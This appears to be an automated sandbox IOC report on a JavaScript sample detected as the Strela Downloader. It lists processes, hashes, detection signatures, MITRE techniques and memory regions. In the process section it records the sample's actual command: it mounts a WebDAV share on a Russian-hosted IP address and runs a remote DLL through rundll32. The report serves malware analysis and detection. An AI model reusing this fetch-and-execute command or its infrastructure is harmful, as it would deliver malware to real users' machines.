Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\184085606271511815.js"

Details

Is windows:	true
Is dropped:	false
PID:	7496
Target ID:	0
Parent PID:	2580
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\184085606271511815.js"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	05:30:59
Date:	31/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff691230000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Yara detected Strela Downloader	Spam, unwanted Advertisements and Ransom Demands
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry

Details

Is windows:	true
Is dropped:	false
PID:	7548
Target ID:	1
Parent PID:	7496
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	"C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	05:30:59
Date:	31/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff661430000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\net.exe

net use \\94.159.113.82@8888\davwwwroot\

Details

Is windows:	true
Is dropped:	false
PID:	7592
Target ID:	3
Parent PID:	7548
Name:	net.exe
Path:	C:\Windows\System32\net.exe
Commandline:	net use \\94.159.113.82@8888\davwwwroot\
Size:	59904
MD5:	0BD94A338EEA5A4E1F2830AE326E6D19
Time:	05:31:00
Date:	31/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6a97b0000
Modulesize:	122880
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Communication To Uncommon Destination Ports	System Summary
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\rundll32.exe

rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry

Details

Is windows:	true
Is dropped:	false
PID:	7644
Target ID:	4
Parent PID:	7548
Name:	rundll32.exe
Class:	rundll32
Path:	C:\Windows\System32\rundll32.exe
Commandline:	rundll32 \\94.159.113.82@8888\davwwwroot\322253044928422.dll,Entry
Size:	71680
MD5:	EF3179D498793BF4234F708D3BE28633
Time:	05:31:01
Date:	31/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6b5aa0000
Modulesize:	94208
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Runs a DLL by calling functions	System Summary	Rundll32
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7556
Target ID:	2
Parent PID:	7548
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	05:30:59
Date:	31/10/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7699e0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://94.159.113.82:8888/4

unknown

http://94.159.113.82:8888/6

unknown

http://94.159.113.82:8888/

unknown

http://94.159.113.82:8888/r

unknown

Domains

Name

Malicious

bg.microsoft.map.fastly.net

199.232.210.172

IPs

Domain

Country

Malicious

94.159.113.82

unknown

Russian Federation

Details

IP:	94.159.113.82
TargetID:	3
Current Path:	C:\Windows\System32\net.exe
Country:	Russian Federation
Countrycode:	RUS
ASN number:	49531
ASN name:	NETCOM-R-ASRU
Private:	false

Signature Hits	Behavior Group	Mitre Attack
JScript performs obfuscated calls to suspicious functions	Data Obfuscation	Scripting
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Opens network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Sigma detected: Communication To Uncommon Destination Ports	System Summary
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Connects to IPs without corresponding DNS lookups	Networking
Runs a DLL by calling functions	System Summary	Rundll32
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe

JScriptSetScriptStateStarted

Memdumps

Base Address

Regiontype

Protect

Malicious

2787C106000

heap

page read and write

2787DC84000

heap

page read and write

2787DC2F000

heap

page read and write

2787DC64000

heap

page read and write

2787DC15000

heap

page read and write

2787DC5C000

heap

page read and write

2787C0CB000

heap

page read and write

2787C290000

heap

page read and write

2787DC5C000

heap

page read and write

2787DC25000

heap

page read and write

2787C0F6000

heap

page read and write

9BFDCFF000

stack

page read and write

2787DC50000

heap

page read and write

2787DC50000

heap

page read and write

2787DC1C000

heap

page read and write

2787DC7C000

heap

page read and write

2787C36A000

heap

page read and write

2787DC84000

heap

page read and write

C9F92FC000

stack

page read and write

2787C10A000

heap

page read and write

2787DD00000

heap

page read and write

1E123F12000

heap

page read and write

2787C0CF000

heap

page read and write

2787C365000

heap

page read and write

1FC3B94E000

heap

page read and write

9BFDAFF000

stack

page read and write

1E123EEA000

heap

page read and write

2787C0E1000

heap

page read and write

2787DC7C000

heap

page read and write

2787DC59000

heap

page read and write

2787DC64000

heap

page read and write

2787DC48000

heap

page read and write

1E123EF0000

heap

page read and write

1E123EF9000

heap

page read and write

2787DC20000

heap

page read and write

2787DC50000

heap

page read and write

1FC3B950000

heap

page read and write

2787C102000

heap

page read and write

1E123EF2000

heap

page read and write

2787DC50000

heap

page read and write

2787DC34000

heap

page read and write

2787DC02000

heap

page read and write

2787C36C000

heap

page read and write

1E123EA0000

heap

page read and write

1E123F12000

heap

page read and write

1FC3B954000

heap

page read and write

C9F937E000

stack

page read and write

1E123DC0000

heap

page read and write

1FC3B930000

heap

page read and write

1E123EF0000

heap

page read and write

1FC3B953000

heap

page read and write

2787DC50000

heap

page read and write

2787DC02000

heap

page read and write

2787DC21000

heap

page read and write

2787DC50000

heap

page read and write

2787C14D000

heap

page read and write

2787DC24000

heap

page read and write

2787DC7C000

heap

page read and write

9BFD7FE000

stack

page read and write

2787DC2F000

heap

page read and write

1FC3B96C000

heap

page read and write

2787C123000

heap

page read and write

2787DC8A000

heap

page read and write

9BFDEFD000

stack

page read and write

1E123F25000

heap

page read and write

1E123E30000

remote allocation

page read and write

2787C0CA000

heap

page read and write

2787DC0C000

heap

page read and write

2787DC14000

heap

page read and write

2787DC07000

heap

page read and write

2787DC1B000

heap

page read and write

2787C123000

heap

page read and write

2787DC74000

heap

page read and write

1E123E30000

remote allocation

page read and write

1FC3B961000

heap

page read and write

1FC3EBF0000

heap

page read and write

9BFE0FB000

stack

page read and write

1E123EF2000

heap

page read and write

1FC3D460000

heap

page read and write

2991C7A000

stack

page read and write

2787DC20000

heap

page read and write

C9F927F000

stack

page read and write

1E123EA5000

heap

page read and write

2787DC20000

heap

page read and write

1FC3B950000

heap

page read and write

1FC3BC80000

heap

page read and write

1FC3B94A000

heap

page read and write

1FC3B938000

heap

page read and write

1E123CE0000

heap

page read and write

2787DC24000

heap

page read and write

2787DC50000

heap

page read and write

2787DC00000

heap

page read and write

2787DC2F000

heap

page read and write

2787C090000

heap

page read and write

2787DC01000

heap

page read and write

9BFDBFF000

stack

page read and write

2787DC4D000

heap

page read and write

2787DC50000

heap

page read and write

2787E6FE000

heap

page read and write

2787DC61000

heap

page read and write

2787DC03000

heap

page read and write

1FC3B958000

heap

page read and write

1FC3B950000

heap

page read and write

2787DC50000

heap

page read and write

2787C119000

heap

page read and write

2787DC6C000

heap

page read and write

1E123DE0000

heap

page read and write

2787DC5C000

heap

page read and write

2787DC50000

heap

page read and write

2787DC40000

heap

page read and write

2787DC1C000

heap

page read and write

2787DC1B000

heap

page read and write

2787DC6C000

heap

page read and write

2787E448000

heap

page read and write

1FC3B96C000

heap

page read and write

1FC3B910000

heap

page read and write

1FC3BC8B000

heap

page read and write

1E123F18000

heap

page read and write

2787DC8E000

heap

page read and write

2787DC50000

heap

page read and write

2787DC38000

heap

page read and write

1E123EC8000

heap

page read and write

2787DC1B000

heap

page read and write

2787C0D0000

heap

page read and write

2787C0A0000

heap

page read and write

2787DC05000

heap

page read and write

2787C109000

heap

page read and write

1FC3BC85000

heap

page read and write

1E123EF9000

heap

page read and write

2787C36C000

heap

page read and write

2787DC0C000

heap

page read and write

1FC3B966000

heap

page read and write

2787DC84000

heap

page read and write

2787C0FC000

heap

page read and write

2787E5AC000

heap

page read and write

2787DC1C000

heap

page read and write

2787E44D000

heap

page read and write

2787DC18000

heap

page read and write

2787DC84000

heap

page read and write

2787DC08000

heap

page read and write

2787DC1B000

heap

page read and write

2787C36B000

heap

page read and write

2787EAE4000

heap

page read and write

2787DC2D000

heap

page read and write

1E123F25000

heap

page read and write

2787C10F000

heap

page read and write

2787C123000

heap

page read and write

2787C123000

heap

page read and write

2787DC10000

heap

page read and write

2787DC3C000

heap

page read and write

2787DC64000

heap

page read and write

2787DC7C000

heap

page read and write

2787DC50000

heap

page read and write

C9F8F3A000

stack

page read and write

2787DC50000

heap

page read and write

2787DC6D000

heap

page read and write

2787C10D000

heap

page read and write

9BFD8FD000

stack

page read and write

2787DC1B000

heap

page read and write

1E123EC0000

heap

page read and write

2787E1A9000

heap

page read and write

2991CFE000

stack

page read and write

2787DC7C000

heap

page read and write

1FC3B950000

heap

page read and write

1E123F1B000

heap

page read and write

1FC3B947000

heap

page read and write

1FC3BB20000

heap

page read and write

2787DC8B000

heap

page read and write

2787C270000

heap

page read and write

2787DC6C000

heap

page read and write

2787DC7C000

heap

page read and write

2787C0E0000

heap

page read and write

9BFD6F9000

stack

page read and write

1FC3B953000

heap

page read and write

2787DC79000

heap

page read and write

2787DC35000

heap

page read and write

2787DC79000

heap

page read and write

9BFE1FF000

stack

page read and write

2787DC11000

heap

page read and write

9BFDDFE000

stack

page read and write

2787DC1D000

heap

page read and write

2787DC19000

heap

page read and write

2787DC55000

heap

page read and write

2787C36A000

heap

page read and write

1FC3BB00000

heap

page read and write

2787DC28000

heap

page read and write

C9F8FBE000

stack

page read and write

2787DC7C000

heap

page read and write

2787DC7C000

heap

page read and write

2787DC45000

heap

page read and write

2787C36E000

heap

page read and write

2787DC59000

heap

page read and write

1FC3F1B0000

trusted library allocation

page read and write

1E123E30000

remote allocation

page read and write

2787DC50000

heap

page read and write

2787DC34000

heap

page read and write

2787DC7C000

heap

page read and write

2787C0FB000

heap

page read and write

2787DC0B000

heap

page read and write

1FC3B953000

heap

page read and write

1FC3EC23000

heap

page read and write

2787DC30000

heap

page read and write

1FC3B953000

heap

page read and write

2787C118000

heap

page read and write

1FC3B957000

heap

page read and write

2787DC74000

heap

page read and write

1E123EE6000

heap

page read and write

2787DC7C000

heap

page read and write

1FC3B971000

heap

page read and write

2787DC0B000

heap

page read and write

2787DC1B000

heap

page read and write

2787DC61000

heap

page read and write

2787C0F9000

heap

page read and write

2787DC3D000

heap

page read and write

1E123EF4000

heap

page read and write

2787DC3C000

heap

page read and write

2991D7D000

stack

page read and write

1FC3EC20000

heap

page read and write

2787DC84000

heap

page read and write

2787DC1B000

heap

page read and write

2787C36C000

heap

page read and write

2787DC6D000

heap

page read and write

2787C360000

heap

page read and write

1E123EEA000

heap

page read and write

1FC3B94A000

heap

page read and write

2787E85C000

heap

page read and write

There are 216 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
184085606271511815.js

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report184085606271511815.js

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
184085606271511815.js